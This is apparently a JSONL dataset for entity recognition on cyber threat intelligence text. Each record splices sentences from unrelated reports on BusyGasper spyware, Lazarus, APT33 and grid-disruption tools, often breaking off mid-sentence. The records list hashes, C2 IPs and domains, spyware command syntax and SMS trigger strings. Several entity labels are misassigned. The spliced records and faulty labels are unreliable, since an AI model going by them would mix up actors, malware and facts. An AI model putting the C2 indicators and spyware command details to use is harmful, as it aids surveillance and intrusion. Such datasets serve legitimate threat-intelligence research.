{"text": "Technical details Here is the meta information for the observed samples , certificates and hardcoded version stamps : Certificate MD5 Module Version Serial Number : 0x76607c02 Issuer : CN=Ron Validity : from = Tue Aug 30 13:01:30 MSK 2016 to = Sat Aug 24 13:01:30 MSK 2041 Subject : CN=Ron 9e005144ea1a583531f86663a5f14607 1 \u2013 18abe28730c53de6d9e4786c7765c3d8 2 2.0 From March 18 to 26 we observed the malware operating in multiple areas of the world . FastUploader is a custom FTP tool designed to exfiltrate data at a faster rate than traditional FTP clients . When CrowdStrike researchers later reproduced the attack , events were present in CozyDuke - also known as CozyBear , CozyCar and Office Monkeys ( among others ) , and whose activity appears to align with advanced persistent threat APT29 - is a threat actor which came to prominence in 2014 when it is believed to have staged a series of precise attacks on high profile targets including the US White House , Department of State and the Democratic National Committee .", "spans": [{"start": 165, "end": 175, "label": "Indicator"}, {"start": 290, "end": 322, "label": "Indicator"}, {"start": 327, "end": 359, "label": "Indicator"}, {"start": 453, "end": 465, "label": "Malware"}, {"start": 478, "end": 481, "label": "System"}, {"start": 549, "end": 552, "label": "System"}, {"start": 568, "end": 591, "label": "Organization"}, {"start": 645, "end": 653, "label": "Malware"}, {"start": 670, "end": 678, "label": "Malware"}, {"start": 681, "end": 688, "label": "Malware"}, {"start": 693, "end": 707, "label": "Malware"}, {"start": 795, "end": 800, "label": "Organization"}, {"start": 955, "end": 969, "label": "Organization"}, {"start": 972, "end": 991, "label": "Organization"}, {"start": 1000, "end": 1029, "label": "Organization"}]}
{"text": "Serial Number : 0x6a0d1fec Issuer : CN=Sun Validity : from = Mon May 16 17:42:40 MSK 2016 to = Fri May 10 17:42:40 MSK 2041 Subject : CN=Sun 9ffc350ef94ef840728564846f2802b0 2 v2.51sun 6c246bbb40b7c6e75c60a55c0da9e2f2 2 v2.96s 7c8a12e56e3e03938788b26b84b80bd6 2 v3.09s Furthermore , the Advanced Threat Research team has discovered Proxysvc , which appears to be an undocumented implant . At this point , additional activity from the attackers continued between March 5 into April , and on April 18 at 11:50 , a second remote access tool known as DarkComet was deployed to csidl_profile\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\smss.exe on the infected computer . In its spear phish , CloudLook also used a self - extracting archive containing a PDF file that lured its victims with information regarding world terrorism .", "spans": [{"start": 16, "end": 26, "label": "Indicator"}, {"start": 141, "end": 173, "label": "Indicator"}, {"start": 185, "end": 217, "label": "Indicator"}, {"start": 227, "end": 259, "label": "Indicator"}, {"start": 287, "end": 311, "label": "Organization"}, {"start": 332, "end": 340, "label": "System"}, {"start": 547, "end": 556, "label": "Malware"}, {"start": 627, "end": 657, "label": "Indicator"}, {"start": 706, "end": 715, "label": "Malware"}]}
{"text": "bde7847487125084f9e03f2b6b05adc3 2 v3.12s 2560942bb50ee6e6f55afc495d238a12 2 v3.18s It \u2019 s interesting that the issuer \u201c Sun \u201d matches the \u201c Sun1 \u201d and \u201c Sun2 \u201d identifiers of infected devices from the FTP server , suggesting they may be test devices . Our investigation into this campaign reveals that the actor used multiple malware implants , including an unknown implant with capabilities similar to Bankshot . This was quickly followed 15 seconds later by the installation of a credential dumping to csidl_profile\\appdata\\roaming\\microsoft\\credentials\\dwm32.exe , and the execution of powershell commands via PowerShell Empire , a freely available post-exploitation framework , to bypass logging on the infected machine . A clever example was \u2018 Office Monkeys LOL Video.zip \u2019 .", "spans": [{"start": 0, "end": 32, "label": "Indicator"}, {"start": 42, "end": 74, "label": "Indicator"}, {"start": 307, "end": 312, "label": "Organization"}, {"start": 404, "end": 412, "label": "System"}, {"start": 505, "end": 566, "label": "Indicator"}, {"start": 590, "end": 600, "label": "System"}, {"start": 614, "end": 631, "label": "System"}, {"start": 750, "end": 778, "label": "Indicator"}]}
{"text": "The analyzed implant has a complex structure , and for now we have observed two modules . The attackers behind Operation GhostSecret used a similar infrastructure to earlier threats , including SSL certificates used by FakeTLS in implants found in the Destover backdoor variant known as Escad , which was used in the Sony Pictures attack . Activity continued throughout April where additional versions of DarkComet , POSHC2 implants , and an AutoIt backdoor were deployed along with further credential dumping activities . Cisco Secure Endpoint ( formerly AMP for Endpoints ) is ideally suited to prevent the execution of the malware detailed in this post .", "spans": [{"start": 94, "end": 103, "label": "Organization"}, {"start": 194, "end": 210, "label": "System"}, {"start": 219, "end": 226, "label": "System"}, {"start": 252, "end": 269, "label": "System"}, {"start": 287, "end": 292, "label": "System"}, {"start": 405, "end": 414, "label": "Malware"}, {"start": 417, "end": 423, "label": "Malware"}, {"start": 442, "end": 457, "label": "Malware"}, {"start": 523, "end": 573, "label": "System"}]}
{"text": "First ( start ) module The first module , which was installed on the targeted device , could be controlled over the IRC protocol and enable deployment of other components by downloading a payload from the FTP server : @ install command As can be seen from the screenshot above , a new component was copied in the system path , though that sort of operation is impossible without root privileges . Based on our analysis of public and private information from submissions , along with product telemetry , it appears Proxysvc was used alongside the 2017 Destover variant and has operated undetected since mid-2017 . Elfin is one of the most active groups currently operating in the Middle East , targeting a large number of organizations across a diverse range of sectors . The malware is designed to cause electric power disruption by interacting with IEC 60870 - 5 - 104 ( IEC-104 ) devices , such as remote terminal units ( RTUs ) , that are commonly leveraged in electric transmission and distribution operations in Europe , the Middle East , and Asia .", "spans": [{"start": 514, "end": 522, "label": "System"}, {"start": 551, "end": 559, "label": "System"}, {"start": 613, "end": 618, "label": "Organization"}]}
{"text": "At the time of writing we had no evidence of an exploit being used to obtain root privileges , though it is possible that the attackers used some unseen component to implement this feature . This new variant resembles parts of the Destover malware , which was used in the 2014 Sony Pictures attack . Over the past three years , the group has utilized a wide array of tools against its victims , ranging from custom built malware to off-the-shelf RATs , indicating a willingness to continually revise its tactics and find whatever tools it takes to compromise its next set of victims . Depending on the platform and on how the code is compiled , these vulnerabilities could lead to arbitrary code execution : Talos is disclosing these vulnerabilities despite no official fix from Open Babel .", "spans": [{"start": 231, "end": 247, "label": "System"}, {"start": 708, "end": 713, "label": "Organization"}, {"start": 779, "end": 789, "label": "Organization"}]}
{"text": "Here is a full list of possible commands that can be executed by the first module : Command name Description @ stop Stop IRC @ quit System.exit ( 0 ) @ start Start IRC @ server Set IRC server ( default value is \u201c irc.freenode.net \u201d ) , port is always 6667 @ boss Set IRC command and control nickname ( default value is \u201c ISeency \u201d ) @ nick Set IRC client nickname @ screen Report every time when screen is on ( enable/disable ) @ root Use root features ( enable/disable ) @ timer Set The Lazarus used a similar infrastructure to earlier threats , including the Destover backdoor variant known as Escad . Symantec has the following protection in place to protect customers against these attacks , APT33 : Backdoor.Notestuk Trojan.Stonedrill Backdoor.Remvio Backdoor.Breut Trojan.Quasar Backdoor.Patpoopy Trojan.Nancrat Trojan.Netweird.B Exp.CVE-2018-20250 SecurityRisk.LaZagne Hacktool.Mimikatz SniffPass . Some cyber criminal groups use their hacking skills to go after large organizations .", "spans": [{"start": 132, "end": 149, "label": "Indicator"}, {"start": 213, "end": 229, "label": "Indicator"}, {"start": 488, "end": 495, "label": "Organization"}, {"start": 561, "end": 578, "label": "System"}, {"start": 596, "end": 601, "label": "System"}, {"start": 696, "end": 701, "label": "Organization"}, {"start": 704, "end": 721, "label": "Malware"}, {"start": 722, "end": 739, "label": "Malware"}, {"start": 740, "end": 755, "label": "Malware"}, {"start": 756, "end": 770, "label": "Malware"}, {"start": 771, "end": 784, "label": "Malware"}, {"start": 785, "end": 802, "label": "Malware"}, {"start": 803, "end": 817, "label": "Malware"}, {"start": 818, "end": 835, "label": "Malware"}, {"start": 836, "end": 854, "label": "Vulnerability"}, {"start": 855, "end": 875, "label": "Malware"}, {"start": 876, "end": 893, "label": "Malware"}, {"start": 894, "end": 903, "label": "Malware"}, {"start": 911, "end": 932, "label": "Organization"}, {"start": 970, "end": 989, "label": "Organization"}]}
{"text": "period of IRCService start @ hide Hide implant icon @ unhide Unhide implant icon @ run Execute specified shell @ broadcast Send command to the second module @ echo Write specified message to log @ install Download and copy specified component to the system path The implant uses a complex intent-based communication mechanism between its components to broadcast commands : Approximate graph of relationships between BusyGasper components Second ( main ) module This module writes a log of the command execution history to the file named \u201c lock \u201d , which is later exfiltrated The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 . APT33 : 5798aefb07e12a942672a60c2be101dc26b01485616713e8be1f68b321747f2f S-SHA2 Notestuk/TURNEDUP . None Enablement and usage of SQL extended stored procedures for Windows shell command execution : PIEHOP ( filename : r3_iec104_control.exe ) ( MD5 : cd8f394652db3d0376ba24a990403d20 ) is a disruption tool written in Python and packaged with PyInstaller version 2.1 + that has the capability to connect to a user supplied remote MSSQL server for uploading files and issuing remote commands to a RTU .", "spans": [{"start": 579, "end": 610, "label": "Organization"}, {"start": 648, "end": 670, "label": "Malware"}, {"start": 708, "end": 713, "label": "Organization"}, {"start": 716, "end": 805, "label": "Malware"}, {"start": 813, "end": 903, "label": "Indicator"}, {"start": 906, "end": 912, "label": "System"}, {"start": 915, "end": 947, "label": "Indicator"}, {"start": 952, "end": 990, "label": "Indicator"}, {"start": 993, "end": 1206, "label": "Malware"}]}
{"text": ". The Advanced Threat Research team uncovered activity related to this campaign in March 2018 , when the actors targeted Turkish banks . APT33 : a67461a0c14fc1528ad83b9bd874f53b7616cfed99656442fb4d9cdd7d09e449 S-SHA2 AutoIt backdoor . This rule was designed to match the decoded URI of any incoming request with the regex , so when the decoded URI matches this regex , the request is dropped .", "spans": [{"start": 6, "end": 30, "label": "Organization"}, {"start": 105, "end": 111, "label": "Organization"}, {"start": 129, "end": 134, "label": "Organization"}, {"start": 137, "end": 142, "label": "Organization"}, {"start": 145, "end": 232, "label": "Malware"}]}
{"text": "Below is a fragment of such a log : Log with specified command Log files can be uploaded to the FTP server and sent to the attacker \u2019 s email inbox . Lazarus used watering hole attacks to compromise legitimate and trusted websites frequently visited by their targets . APT33 : f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5 S-SHA2 Gpppassword . In at least one instance , the malicious code was a lightweight Ruby script that was executed via the JumpCloud agent .", "spans": [{"start": 150, "end": 157, "label": "Organization"}, {"start": 269, "end": 274, "label": "Organization"}, {"start": 277, "end": 360, "label": "Malware"}, {"start": 415, "end": 480, "label": "Malware"}]}
{"text": "It \u2019 s even possible to send log messages via SMS to the attacker \u2019 s number . Malefactors used watering hole attacks to compromise legitimate and trusted websites frequently visited by their targets . APT33 : 87e2cf4aa266212aa8cf1b1c98ae905c7bac40a6fc21b8e821ffe88cf9234586 S-SHA2 LaZagne . We found roughly 500 domain names that lead or have led to the \u201c Pig network \u201d between 2015 to March 2017 .", "spans": [{"start": 79, "end": 90, "label": "Organization"}, {"start": 202, "end": 207, "label": "Organization"}, {"start": 210, "end": 289, "label": "Malware"}, {"start": 355, "end": 370, "label": "Organization"}]}
{"text": "As the screenshot above shows , the malware has its own command syntax that represents a combination of characters while the \u201c # \u201d symbol is a delimiter . Feedback from our Smart Protection Network revealed that apart from attacks in North America ( mainly the U.S. ) , Europe , and South America , the campaign also noticeably affected enterprises in Taiwan , Hong Kong , China , and Bahrain . APT33 : 709df1bbd0a5b15e8f205b2854204e8caf63f78203e3b595e0e66c918ec23951 S-SHA2 LaZagne . CISA noted that threat actors ransomware tactics and techniques were continuing to evolve and become more technologically sophisticated with every passing month .", "spans": [{"start": 173, "end": 197, "label": "Organization"}, {"start": 337, "end": 348, "label": "Organization"}, {"start": 395, "end": 400, "label": "Organization"}, {"start": 403, "end": 482, "label": "Malware"}, {"start": 485, "end": 489, "label": "Organization"}, {"start": 501, "end": 514, "label": "Organization"}]}
{"text": "A full list of all possible commands with descriptions can be found in Appendix II below . On February 28 , the McAfee discovered that the cybercrime group HIDDEN COBRA continues to target cryptocurrency and financial organizations . APT33 : a23c182349f17398076360b2cb72e81e5e23589351d3a6af59a27e1d552e1ec0 S-SHA2 Quasar RAT . Based on the use of domain names they registered , the group started out in the business of fake / rogue anti - virus products in 2007 .", "spans": [{"start": 112, "end": 118, "label": "Organization"}, {"start": 139, "end": 155, "label": "Organization"}, {"start": 156, "end": 168, "label": "Organization"}, {"start": 189, "end": 203, "label": "Organization"}, {"start": 208, "end": 231, "label": "Organization"}, {"start": 234, "end": 239, "label": "Organization"}, {"start": 242, "end": 324, "label": "Malware"}, {"start": 419, "end": 453, "label": "Malware"}]}
{"text": "The malware has all the popular capabilities of modern spyware . On February 28 , the McAfee Advanced Threat Research team discovered that the cybercrime group HIDDEN COBRA continues to target cryptocurrency and financial organizations . APT33 : 0b3610524ff6f67c59281dbf4a24a6e8753b965c15742c8a98c11ad9171e783d S-SHA2 Quasar RAT . These victims decrypted their files without accepting the ransom demands saving these individuals an estimated 1.5 billion .", "spans": [{"start": 86, "end": 117, "label": "Organization"}, {"start": 143, "end": 159, "label": "Organization"}, {"start": 160, "end": 172, "label": "Organization"}, {"start": 193, "end": 207, "label": "Organization"}, {"start": 212, "end": 235, "label": "Organization"}, {"start": 238, "end": 243, "label": "Organization"}, {"start": 246, "end": 328, "label": "Malware"}, {"start": 337, "end": 344, "label": "Organization"}]}
{"text": "Below is a description of the most noteworthy : The implant is able to spy on all available device sensors and to log registered events . While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 . APT33 : d5262f1bc42d7d5d0ebedadd8ab90a88d562c7a90ff9b0aed1b3992ec073e2b0 S-SHA2 Quasar RAT . The group itself likes to pretend to be a cybersecurity organization as shown in the ransom note below .", "spans": [{"start": 285, "end": 298, "label": "Vulnerability"}, {"start": 301, "end": 314, "label": "Vulnerability"}, {"start": 321, "end": 334, "label": "Vulnerability"}, {"start": 337, "end": 342, "label": "Organization"}, {"start": 345, "end": 427, "label": "Malware"}, {"start": 472, "end": 498, "label": "Organization"}]}
{"text": "Moreover , there is a special handler for the accelerometer that is able to calculate and log the device \u2019 s speed : This feature is used in particular by the command \u201c tk0 \u201d that mutes the device , disables keyguard , turns off the brightness , uses wakelock and listens to device sensors . In this analysis , we observed the return of HIDDEN COBRA 's Bankshot malware implant surfacing in the Turkish financial system . APT33 : ae1d75a5f87421953372e79c081e4b0a929f65841ed5ea0d380b6289e4a6b565 S-SHA2 Remcos . Neither France or Germany have been spared by the growing menace of ransomware , either .", "spans": [{"start": 337, "end": 349, "label": "Organization"}, {"start": 353, "end": 369, "label": "System"}, {"start": 422, "end": 427, "label": "Organization"}, {"start": 430, "end": 508, "label": "Malware"}, {"start": 579, "end": 589, "label": "Malware"}]}
{"text": "This allows it to silently execute any backdoor activity without the user knowing that the device is in an active state . In this new , aggressive campaign we see a return of the Bankshot implant , which last appeared in 2017 . APT33 : e999fdd6a0f5f8d1ca08cf2aef47f5ddc0ee75879c6f2c1ee23bc31fb0f26c70 S-SHA2 Remcos . To hide their true location , the threat actor used the ExpressVPN service that showed connections to the web shell ( Notice.php ) on a compromised server coming from two IP addresses in London .", "spans": [{"start": 179, "end": 187, "label": "System"}, {"start": 228, "end": 233, "label": "Organization"}, {"start": 236, "end": 314, "label": "Malware"}, {"start": 351, "end": 363, "label": "Organization"}, {"start": 373, "end": 391, "label": "System"}, {"start": 423, "end": 447, "label": "System"}, {"start": 484, "end": 500, "label": "Indicator"}]}
{"text": "As soon as the user picks up the device , the implant will detect a motion event and execute the \u201c tk1 \u201d and \u201c input keyevent 3 \u201d commands . This attack resembles previous attacks by HIDDEN COBRA conducted against the SWIFT . APT33 : 018360b869d8080cf5bcca1a09eb8251558378eb6479d8d89b8c80a8e2fa328c S-SHA2 Remcos . The Twitter handle used by Hack520 indicates also an \u201c est \u201d portion .", "spans": [{"start": 183, "end": 195, "label": "Organization"}, {"start": 226, "end": 231, "label": "Organization"}, {"start": 234, "end": 312, "label": "Malware"}, {"start": 342, "end": 349, "label": "Organization"}]}
{"text": "\u201c tk1 \u201d will disable all the effects of the \u201c tk0 \u201d command , while \u201c input keyevent 3 \u201d is the shell command that simulates the pressing of the \u2018 home \u2019 button so all the current activities will be minimized and the user won \u2019 t suspect anything . The exploit , which takes advantage of CVE-2018-4878 , allows an attacker to execute arbitrary code such as an implant . APT33 : 367e78852134ef488ecf6862e71f70a3b10653e642bda3df00dd012c4e130330 S-SHA2 Remcos . Most recently , the Ransomware and Financial Stability Act was introduced .", "spans": [{"start": 288, "end": 301, "label": "Vulnerability"}, {"start": 314, "end": 322, "label": "Organization"}, {"start": 370, "end": 375, "label": "Organization"}, {"start": 378, "end": 456, "label": "Malware"}]}
{"text": "Location services to enable ( GPS/network ) tracking : The email command and control protocol . These implants are variations of earlier forms of Bankshot , a remote access tool that gives an attacker full capability on a victim 's system . APT33 : ea5295868a6aef6aac9e117ef128e9de107817cc69e75f0b20648940724880f3 S-SHA2 Remcos . LIGHTWORK ( filename : OT_T855_IEC104_GR.exe ) ( MD5 : 7b6678a1c0000344f4faf975c0cfc43d ) is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": [{"start": 146, "end": 154, "label": "System"}, {"start": 192, "end": 200, "label": "Organization"}, {"start": 241, "end": 246, "label": "Organization"}, {"start": 249, "end": 327, "label": "Malware"}, {"start": 330, "end": 339, "label": "System"}, {"start": 342, "end": 374, "label": "Indicator"}, {"start": 379, "end": 417, "label": "Indicator"}]}
{"text": "The implant can log in to the attackers email inbox , parse emails for commands in a special \u201c Cmd \u201d folder and save any payloads to a device from email attachments . Bankshot was first reported by the Department of Homeland Security on December 13 , 2017 , and has only recently resurfaced in newly compiled variants . APT33 : 6401abe9b6e90411dc48ffc863c40c9d9b073590a8014fe1b0e6c2ecab2f7e18 S-SHA2 SniffPass . This enables GOGETTER to maintain persistence across reboots .", "spans": [{"start": 167, "end": 175, "label": "System"}, {"start": 202, "end": 233, "label": "Organization"}, {"start": 320, "end": 325, "label": "Organization"}, {"start": 328, "end": 409, "label": "Malware"}, {"start": 425, "end": 433, "label": "System"}]}
{"text": "Accessing the \u201c Cmd \u201d folder in the attacker \u2019 s email box Moreover , it can send a specified file or all the gathered data from the victim device via email . We have found what may be an early data-gathering stage for future possible heists from financial organizations in Turkey ( and possibly other countries ) . APT33 : bf9c589de55f7496ff14187b1b5e068bd104396c23418a18954db61450d21bab S-SHA2 DarkComet . The compromise of a system that is within the bot net is simply used to facilitate another attack .", "spans": [{"start": 247, "end": 270, "label": "Organization"}, {"start": 316, "end": 321, "label": "Organization"}, {"start": 324, "end": 405, "label": "Malware"}, {"start": 428, "end": 434, "label": "Organization"}]}
{"text": "Emergency SMS commands . Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . APT33 : af41e9e058e0a5656f457ad4425a299481916b6cf5e443091c7a6b15ea5b3db3 S-SHA2 DarkComet . Checking the transcript log file created to see the full session .", "spans": [{"start": 25, "end": 34, "label": "Malware"}, {"start": 44, "end": 57, "label": "Vulnerability"}, {"start": 143, "end": 148, "label": "Organization"}, {"start": 151, "end": 232, "label": "Malware"}]}
{"text": "If an incoming SMS contains one of the following magic strings : \u201d 2736428734\u2033 or \u201d 7238742800\u2033 the malware will execute multiple initial commands : Keylogger implementation Keylogging is implemented in an original manner . This malware report contains analysis of one 32-bit Windows executable file , identified as a Remote Access Trojan ( RAT ) . APT33 : c7a2559f0e134cafbfc27781acc51217127a7739c67c40135be44f23b3f9d77b S-SHA2 AutoIt FTP tool . Attackers could exploit these vulnerabilities to carry out a variety of attacks , in some cases gaining the ability to execute remote code on the targeted machine .", "spans": [{"start": 67, "end": 78, "label": "Indicator"}, {"start": 84, "end": 95, "label": "Indicator"}, {"start": 269, "end": 299, "label": "Malware"}, {"start": 318, "end": 338, "label": "System"}, {"start": 341, "end": 344, "label": "System"}, {"start": 349, "end": 354, "label": "Organization"}, {"start": 357, "end": 439, "label": "Malware"}, {"start": 447, "end": 456, "label": "Organization"}]}
{"text": "Immediately after activation , the malware creates a textView element in a new window with the following layout parameters : All these parameters ensure the element is hidden from the user . This malware is capable of accessing device configuration data , downloading additional files , executing commands , modifying the registry , capturing screen shots , and exfiltrating data . APT33 : 99c1228d15e9a7693d67c4cb173eaec61bdb3e3efdd41ee38b941e733c7104f8 S-SHA2 .NET FTP tool . The file collected system information , and then invoked a WMI instance in the rootsecuritycenter namespace to identify security products installed on the system before dropping more data collection malware .", "spans": [{"start": 235, "end": 253, "label": "Malware"}, {"start": 256, "end": 284, "label": "Malware"}, {"start": 287, "end": 305, "label": "Malware"}, {"start": 308, "end": 330, "label": "Malware"}, {"start": 333, "end": 355, "label": "Malware"}, {"start": 362, "end": 379, "label": "Malware"}, {"start": 382, "end": 387, "label": "Organization"}, {"start": 390, "end": 470, "label": "Malware"}]}
{"text": "Then it adds onTouchListener to this textView and is able to process every user tap . Volgmer is a backdoor Trojan designed to provide covert access to a compromised system . APT33 : 94526e2d1aca581121bd79a699a3bf5e4d91a4f285c8ef5ab2ab6e9e44783997 S-SHA2 PowerShell downloader ( registry.ps1 ) . Ideology", "spans": [{"start": 86, "end": 93, "label": "System"}, {"start": 99, "end": 114, "label": "System"}, {"start": 127, "end": 148, "label": "Malware"}, {"start": 175, "end": 180, "label": "Organization"}, {"start": 183, "end": 276, "label": "Malware"}, {"start": 279, "end": 291, "label": "Malware"}]}
{"text": "Interestingly , there is an allowlist of tapped activities : ui.ConversationActivity ui.ConversationListActivity SemcInCallScreen Quadrapop SocialPhonebookActivity The listener can operate with only coordinates , so it calculates pressed characters by matching given values with hardcoded ones : Additionally , if there is a predefined command , the keylogger can make a screenshot of the tapped display area : Manual access and operator menu There is a hidden menu ( Activity ) for controlling implant features that It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections ; however , HIDDEN COBRA actors use a suite of custom tools , some of which could also be used to initially compromise a system . APT33 : dedfbc8acf1c7b49fb30af35eda5e23d3f7a202585a5efe82ea7c2a785a95f40 S-SHA2 POSHC2 backdoor . In late May , SentinelLabs observed a new Iranian statesponsored APT , which they dubbed Agrius , as conducting an extensive espionagedestruction campaign against Israeli targets since 2020 .", "spans": [{"start": 591, "end": 598, "label": "System"}, {"start": 622, "end": 641, "label": "Organization"}, {"start": 657, "end": 669, "label": "System"}, {"start": 740, "end": 745, "label": "Organization"}, {"start": 748, "end": 835, "label": "Malware"}, {"start": 852, "end": 864, "label": "Organization"}, {"start": 903, "end": 906, "label": "Organization"}, {"start": 927, "end": 933, "label": "Organization"}, {"start": 953, "end": 992, "label": "Organization"}, {"start": 1001, "end": 1016, "label": "Organization"}]}
{"text": "looks like it was created for manual operator control . Since at least 2013 , HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government , financial , automotive , and media industries . APT33 : 95.211.191.117 update-sec.com . We have observed some lower degrees of confidence overlaps in post - exploitation stages among these UNC groups , like using the same recon commands and utilities available on Windows .", "spans": [{"start": 78, "end": 97, "label": "Organization"}, {"start": 123, "end": 138, "label": "System"}, {"start": 165, "end": 175, "label": "Organization"}, {"start": 178, "end": 187, "label": "Organization"}, {"start": 190, "end": 200, "label": "Organization"}, {"start": 207, "end": 223, "label": "Organization"}, {"start": 226, "end": 231, "label": "Organization"}, {"start": 234, "end": 248, "label": "Indicator"}, {"start": 249, "end": 263, "label": "Indicator"}, {"start": 385, "end": 449, "label": "Indicator"}]}
{"text": "To activate this menu the operator needs to call the hardcoded number \u201c 9909 \u201d from the infected device : A hidden menu then instantly appears on the device display : The operator can use this interface to type any command for execution . Therefore , it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer . APT33 : 8.26.21.120 mynetwork.ddns.net . Analysis into the malware and its functionality reveals that its capabilities are comparable to those employed in previous incidents and malware , such as and , which were both malware variants deployed in the past to impact electricity transmission and distribution via IEC-104 .", "spans": [{"start": 282, "end": 302, "label": "System"}, {"start": 361, "end": 368, "label": "System"}, {"start": 371, "end": 376, "label": "Organization"}, {"start": 379, "end": 390, "label": "Indicator"}, {"start": 391, "end": 409, "label": "Indicator"}, {"start": 473, "end": 690, "label": "Malware"}]}
{"text": "It also shows a current malware log . As a backdoor Trojan , Volgmer has several capabilities including : gathering system information , updating service registry keys , downloading and uploading files , executing commands , terminating processes , and listing directories . APT33 : 162.250.145.234 mynetwork.ddns.net . Money as a motivation may be the most frequent but also easiest to deal with of the four .", "spans": [{"start": 43, "end": 58, "label": "System"}, {"start": 61, "end": 68, "label": "System"}, {"start": 106, "end": 134, "label": "Malware"}, {"start": 137, "end": 167, "label": "Malware"}, {"start": 170, "end": 181, "label": "Malware"}, {"start": 186, "end": 201, "label": "Malware"}, {"start": 204, "end": 222, "label": "Malware"}, {"start": 225, "end": 246, "label": "Malware"}, {"start": 253, "end": 272, "label": "Malware"}, {"start": 275, "end": 280, "label": "Organization"}, {"start": 283, "end": 298, "label": "Indicator"}, {"start": 299, "end": 317, "label": "Indicator"}]}
{"text": "Infrastructure FTP server The attackers used ftp : //213.174.157 [ . In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality . APT33 : 91.235.142.76 mywinnetwork.ddns.net . It supports loading arbitrary .NET assemblies encoded as Base64 sent to it via chat comments .", "spans": [{"start": 45, "end": 68, "label": "Indicator"}, {"start": 119, "end": 145, "label": "Organization"}, {"start": 155, "end": 172, "label": "Malware"}, {"start": 189, "end": 194, "label": "Organization"}, {"start": 197, "end": 210, "label": "Indicator"}, {"start": 211, "end": 232, "label": "Indicator"}]}
{"text": "] 151/ as a command and control server . Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library ( .dll ) APT33 : 8.26.21.119 hyperservice.ddns.net . The U.S. government attributed the SolarWinds supply chain compromise which we track as UNC2452 to the Russian Foreign Intelligence Service ( SVR ) .", "spans": [{"start": 41, "end": 48, "label": "System"}, {"start": 140, "end": 144, "label": "Malware"}, {"start": 147, "end": 152, "label": "Organization"}, {"start": 155, "end": 166, "label": "Indicator"}, {"start": 167, "end": 188, "label": "Indicator"}, {"start": 191, "end": 210, "label": "Organization"}, {"start": 279, "end": 286, "label": "Organization"}, {"start": 294, "end": 338, "label": "Organization"}]}
{"text": "The IP belongs to the free Russian web hosting service Ucoz . Lazarus actors commonly maintain persistence on a victim 's system by installing the malware-as-a-service . APT33 : 8.26.21.120 [REDACTED].ddns.net . The videos were quickly passed around offices while users \u2019 systems were silently infected in the background , and many of the APT \u2019s components were signed with phony Intel and AMD digital certificates .", "spans": [{"start": 62, "end": 76, "label": "Organization"}, {"start": 170, "end": 175, "label": "Organization"}, {"start": 178, "end": 189, "label": "Indicator"}, {"start": 190, "end": 209, "label": "Indicator"}]}
{"text": "Files Description CMDS * .txt Text files with commands to execute supersu.apk SuperSU ( eu.chainfire.supersu , https : //play.google.com/store/apps/details ? Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government - referred to by the U.S. Government as BADCALL . APT33 : 213.252.244.14 service-avant.com . Individuals who have access to critical information or systems can easily choose to misuse that accessto the detriment of their organization .", "spans": [{"start": 66, "end": 77, "label": "Indicator"}, {"start": 88, "end": 108, "label": "Indicator"}, {"start": 111, "end": 157, "label": "Indicator"}, {"start": 171, "end": 186, "label": "Organization"}, {"start": 198, "end": 201, "label": "Organization"}, {"start": 206, "end": 209, "label": "Organization"}, {"start": 221, "end": 235, "label": "System"}, {"start": 302, "end": 317, "label": "Organization"}, {"start": 331, "end": 336, "label": "Organization"}, {"start": 339, "end": 353, "label": "Indicator"}, {"start": 354, "end": 371, "label": "Indicator"}]}
{"text": "id=eu.chainfire.supersu ) tool 246.us us.x SuperSU ELF binaries supersu.cfg supersu.cfg.ju supersu.cfg.old SuperSU configs with spyware implant mention bb.txt BusyBox v1.26.2 ELF file bdata.xml Config file for excluding malware components from Android battery saver feature Doze bdatas.apk Main implant module com.android.network.irc.apk Start implant module MobileManagerService.apk ASUS firmware system component ( clean ) mobilemanager.apk The malware uses a custom binary protocol to beacon back to the command and control ( C2 ) server , often via TCP port 8080 or 8088 , with some payloads implementing Secure Socket Layer ( SSL ) encryption to obfuscate communications . APT33 : 91.235.142.124 mywinnetwork.ddns.net . If you can understand why a hacker hacks their motivations a little more clearly , along with who is most likely to be targeting your specific organization , you can bolster your defenses and be ready for whatever the threat landscape throws your way .", "spans": [{"start": 31, "end": 37, "label": "Indicator"}, {"start": 38, "end": 42, "label": "Indicator"}, {"start": 64, "end": 75, "label": "Indicator"}, {"start": 76, "end": 90, "label": "Indicator"}, {"start": 91, "end": 106, "label": "Indicator"}, {"start": 152, "end": 158, "label": "Indicator"}, {"start": 184, "end": 193, "label": "Indicator"}, {"start": 244, "end": 251, "label": "System"}, {"start": 279, "end": 289, "label": "Indicator"}, {"start": 310, "end": 337, "label": "Indicator"}, {"start": 359, "end": 383, "label": "Indicator"}, {"start": 384, "end": 388, "label": "Organization"}, {"start": 425, "end": 442, "label": "Indicator"}, {"start": 462, "end": 484, "label": "System"}, {"start": 488, "end": 494, "label": "System"}, {"start": 609, "end": 628, "label": "System"}, {"start": 631, "end": 634, "label": "System"}, {"start": 661, "end": 675, "label": "Organization"}, {"start": 678, "end": 683, "label": "Organization"}, {"start": 686, "end": 700, "label": "Indicator"}, {"start": 701, "end": 722, "label": "Indicator"}, {"start": 753, "end": 759, "label": "Organization"}]}
